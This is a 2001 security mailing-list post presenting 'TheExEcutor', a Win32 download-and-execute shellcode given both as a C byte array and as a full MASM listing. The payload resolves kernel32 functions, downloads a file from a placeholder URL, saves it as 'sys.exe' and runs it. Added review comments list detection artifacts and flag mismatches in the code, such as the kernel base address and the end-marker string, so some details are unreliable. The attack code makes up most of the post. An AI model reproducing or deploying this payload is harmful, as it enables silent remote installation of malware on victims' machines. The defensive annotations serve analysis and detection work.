TheExEcutor Class A v1.0 - Special Win32 Shellcode
From: Enrique A. Compań Gzz. (enrique@virtekweb.net)Date: 09/08/01
Message-ID: <001001c138a6$44de7200$ab06050a@none> From: "Enrique A. Compań Gzz." <enrique@virtekweb.net> To: <vuln-dev@securityfocus.com> Subject: TheExEcutor Class A v1.0 - Special Win32 Shellcode Date: Sat, 8 Sep 2001 15:38:24 -0500
This is the 1st version of my download & execute code... it searches the
EXPORT table of KERNEL32
at a given KERNEL BASE.
This code is the smallest I've seen in its class... less than 300 bytes
Can it be even smaller? Yes... Can it be more optimized? Yes... That will be done
in future releases.
Class B of this shellcode will search for the functions in the
**IMPORT** table at a given
base.... for example, inetinfo.exe's base is 1000000h; by looking at the
import table there, you will
never fail executing the shellcode, you'll always get the correct addresses
=)....
Also compression & polymorphism will be implemented.
I created an exploit that uses Class B.... it has never failed. (scary)
Attached to this message: The ASM code and a VC++ file to test the
shellcode.............
Note: you have to change the C++ file... put another EIP; the one I'm using
is in shell32 (call esp or jmp esp)...
I'm using W2k SP1. Also, change the scode and include the URL you want.
/* Byte image of the MASM listing further down in this message (spot-check:
 * the opening bytes EB 67 5E 8B EC are the jmp / pop esi / mov ebp,esp at
 * shell_code_start).  The "http://..." literal on the last line is only a
 * placeholder: an unsigned char initializer list cannot take a string
 * literal, and the author's note below says to replace it with the
 * individual bytes.
 * Static artifacts a defender can match on: the plaintext API-name strings,
 * the 0xFF separators between them (turned into NULs at run time), the
 * 4-byte base 0xFF,0xFF,0xE8,0x77 at the front of the data, and the
 * trailing 0x4B,0x49,0x4B,0x45 ("KIKE") marker the decode loop stops on. */
unsigned char TheExEcutor[293] = {
0xEB, 0x67, 0x5E, 0x8B, 0xEC, 0x8B, 0x06, 0x66, 0x33, 0xC0, 0x8B, 0xD8,
0x03, 0x40, 0x3C, 0x8B,
0x40, 0x78, 0x03, 0xC3, 0x8B, 0x78, 0x20, 0x8D, 0x3C, 0x3B, 0x03, 0x1F,
0x33, 0xD2, 0x33, 0xC9,
0x43, 0x38, 0x13, 0x75, 0x01, 0x41, 0x81, 0x3B, 0x47, 0x65, 0x74, 0x50,
0x75, 0x0B, 0x81, 0x7B,
0x04, 0x72, 0x6F, 0x63, 0x41, 0x75, 0x02, 0x74, 0x02, 0xEB, 0xE5, 0x50,
0x41, 0x33, 0xC0, 0xB0,
0x04, 0xF7, 0xE1, 0x8B, 0xC8, 0x58, 0x03, 0xC1, 0x83, 0xC0, 0x24, 0xFF,
0x76, 0x02, 0x66, 0xFF,
0x30, 0x5B, 0x56, 0x83, 0xC6, 0x04, 0x46, 0x80, 0x3E, 0xFF, 0x75, 0x03,
0x80, 0x36, 0xFF, 0x81,
0x3E, 0x4B, 0x49, 0x4B, 0x45, 0x75, 0xEF, 0xEB, 0x02, 0xEB, 0x4B, 0x5E,
0x8B, 0xE5, 0x8B, 0x06,
0x66, 0x33, 0xC0, 0x50, 0x83, 0xC6, 0x04, 0x56, 0x50, 0xFF, 0xD3, 0x83,
0xC6, 0x0D, 0x56, 0xFF,
0xD0, 0x83, 0xC6, 0x07, 0x56, 0x50, 0xFF, 0xD3, 0x33, 0xC9, 0x51, 0x51,
0x83, 0xC6, 0x13, 0x56,
0x83, 0xC6, 0x1C, 0x56, 0x51, 0xFF, 0xD0, 0x58, 0x50, 0x83, 0xEE, 0x08,
0x56, 0x50, 0xFF, 0xD3,
0x33, 0xC9, 0x51, 0x83, 0xEE, 0x14, 0x56, 0xFF, 0xD0, 0x58, 0x83, 0xC6,
0x08, 0x56, 0x50, 0xFF,
0xD3, 0x33, 0xC9, 0x51, 0xFF, 0xD0, 0xE8, 0x47, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xE8, 0x77, 0x4C,
0x6F, 0x61, 0x64, 0x4C, 0x69, 0x62, 0x72, 0x61, 0x72, 0x79, 0x41, 0xFF,
0x55, 0x52, 0x4C, 0x4D,
0x4F, 0x4E, 0xFF, 0x55, 0x52, 0x4C, 0x44, 0x6F, 0x77, 0x6E, 0x6C, 0x6F,
0x61, 0x64, 0x54, 0x6F,
0x46, 0x69, 0x6C, 0x65, 0x41, 0xFF, 0x73, 0x79, 0x73, 0x2E, 0x65, 0x78,
0x65, 0xFF, 0x45, 0x78,
0x69, 0x74, 0x50, 0x72, 0x6F, 0x63, 0x65, 0x73, 0x73, 0xFF, 0x57, 0x69,
0x6E, 0x45, 0x78, 0x65,
0x63, 0xFF, "http://box.net/baby.exe", 0xFF, 0x4B, 0x49, 0x4B, 0x45,
} ;
NOTE: SUBSTITUTE THE URL WITH THE ONE YOU WANT, I.E. "0x68, 0x74, 0x74,
0x70...." (HTTP...)....
;
; "TheExEcutor" Class A v1.0 - Win32 Shellcode
;
; Copyright (c) 2001 by Enrique A. Compań Gzz.
;
; Virtek Labs
;
; http://www.virtekweb.net/labs
;
;
; Downloads & Executes a file. It searches for function addresses
; automatically by looking at the EXPORT table of Kernel32 with a
; default Kernel base of 78e80000h. You can change this.
;
;-----------------------------------------------------------------------
; TheExEcutor Class A - flat, position-independent Win32 payload (MASM,
; Intel syntax, stdcall callees).
; Flow: a jmp/call pair leaves the address of vars_start in ESI; the
; export directory of the module at the base stored in vars_start is
; walked until the name "GetProcA..." is found (compared as the dwords
; 'PteG' and 'Acor'); the 0ffh separators in the data are turned into
; NULs; then LoadLibraryA, URLDownloadToFileA, WinExec and ExitProcess
; are resolved by name and called in that order.
; NOTE(review): the base bytes at vars_start are 0ffh,0ffh,0e8h,077h,
; i.e. 77e80000h after "xor ax, ax", whereas the header comment above
; this listing says 78e80000h.  The code only works when kernel32 is
; mapped at exactly that address (the author states W2k SP1); on any
; other layout the export walk reads unrelated memory.
; Defender artifacts: the plaintext strings LoadLibraryA, URLMON,
; URLDownloadToFileA, WinExec, ExitProcess and an http:// URL separated
; by 0ffh bytes; behaviourally, URLDownloadToFileA followed by WinExec
; of the freshly written file from a process that is not a browser.
;-----------------------------------------------------------------------
.386
.model flat, stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
include \masm32\include\user32.inc ;user32 is not referenced by the code below
includelib \masm32\lib\user32.lib
.data
data db "blah" ;not referenced by the code below
.code
shell_code_start:
jmp fix_long_jmp ;Jump to call back function (two short jmps; see fix_long_jmp)
call_back:
pop esi ;ESI = first var offset (return address pushed by "call call_back")
real_code_start:
mov ebp, esp ;Normalize the stack
mov eax, [esi] ;eax = ptr to "MZ" (Kernel Base)
xor ax, ax ;the stored base has 0ffffh in its low word (no NUL bytes); clear it
mov ebx, eax ;ebx = ptr to "MZ"
add eax, [eax+3ch] ;eax = ptr to "PE"
mov eax, [eax+78h] ;eax = export tables RVA
add eax, ebx ;eax = ptr to export tables
mov edi, [eax+20h] ;edi = names tables RVA
lea edi, [edi+ebx] ;edi = names table ptr
; Ex table = 77ed5c20
; Names tables with RVAs of names = 77ed6f92
add ebx, [edi] ;ebx = ptr to the first exported name
xor edx, edx ;dl = 0, used as the NUL to compare against
xor ecx, ecx ;ecx = number of NUL terminators walked past
search_function:
inc ebx
cmp [ebx], dl
jne no_zero
inc ecx ;one more name boundary passed
no_zero:
cmp [ebx], DWORD PTR 'PteG' ;bytes "GetP" in memory
jne no_match
cmp [ebx+4], DWORD PTR 'Acor' ;bytes "rocA" in memory
jne no_match
je search_complete
no_match:
jmp search_function
search_complete:
push eax ;keep the export directory ptr across the mul
inc ecx
xor eax, eax
mov al, 4
mul ecx ;eax = 4*(ecx+1), clobbers edx (edx is re-zeroed below before use)
mov ecx, eax
pop eax
add eax, ecx
add eax, 024h ;eax = export dir + 4*(ecx+1) + 24h; relies on the fixed layout noted above - unverified
push [esi+2] ;dword whose low word is the high half of the base (77e8h)
push word ptr [eax] ;16-bit push, then a 32-bit pop: low word from [eax], high word from the dword above
pop ebx ;EBX = GetProcAddress address... finally!
; Decode the NULL chars: every 0ffh byte after the base becomes 00h
push esi
add esi, 4 ;skip the 4-byte base
decode_loop:
inc esi
cmp byte ptr [esi], 0ffh
jne skip_xor
xor byte ptr [esi], 0ffh ;0ffh xor 0ffh = 0 (other bytes are left untouched)
skip_xor:
cmp [esi], dword ptr 'EKIK' ;stop on the bytes "KIKE"
jne decode_loop
; NOTE(review): the data in this listing ends with "***",0h, not "KIKE";
; the C array earlier in the message ends with 4Bh,49h,4Bh,45h instead.
;Trick to avoid Nulls in the first jmp instruction...
jmp skip_fix_long_jmp ;Skip the special jump
fix_long_jmp:
jmp pi_offset ;Continue the jump to the call back function
skip_fix_long_jmp:
;Now we Download & Execute the file and terminate
pop esi ;ESI = vars_start again
mov esp, ebp ;Normalize ESP
mov eax, [esi] ;eax = ptr to "MZ" (Kernel Base)
xor ax, ax
push eax ;base stays on the stack; the stdcall callees clean only their own args, so "pop eax" below re-reads it
add esi, 4
push esi ;"LoadLibraryA"
push eax
call ebx ;Call GetProcAddress
add esi, 13 ;"URLMON"
push esi
call eax ;Call LoadLibraryA
add esi, 7 ;"URLDownloadToFileA"
push esi
push eax
call ebx ;Call GetProcAddress
xor ecx, ecx
push ecx
push ecx
add esi, 19 ;"sys.exe"
push esi
add esi, 28 ;the URL
push esi
push ecx
call eax ;Call URLDownloadToFileA
pop eax ;kernel base pushed above
push eax
sub esi, 8 ;"WinExec"
push esi
push eax
call ebx ;Call GetProcAddress
xor ecx, ecx
push ecx
sub esi, 20 ;"sys.exe"
push esi
call eax ;Call WinExec
pop eax ;kernel base pushed above
add esi, 8 ;"ExitProcess"
push esi
push eax
call ebx ;Call GetProcAddress
xor ecx, ecx
push ecx
call eax ;Call ExitProcess
real_code_end:
pi_offset:
call call_back ;Return and push the address of the vars
vars_start:
db 0ffh,0ffh,0e8h,077h ;Specify the Kernel Base @ 77e80000h (low word is 0ffffh until "xor ax, ax")
db "LoadLibraryA",0ffh
db "URLMON",0ffh
db "URLDownloadToFileA",0ffh
db "sys.exe",0ffh
db "ExitProcess", 0ffh
db "WinExec",0ffh
db "http://box.net/baby.exe",0ffh ;The URL: Be sure to end it with 0ffh
db "***",0h ;Marker to know we reached the END (the decode loop above looks for "KIKE", see note there)
end shell_code_start
--------------
Wooh... that was long...
See u....
- application/x-zip-compressed attachment: code.zip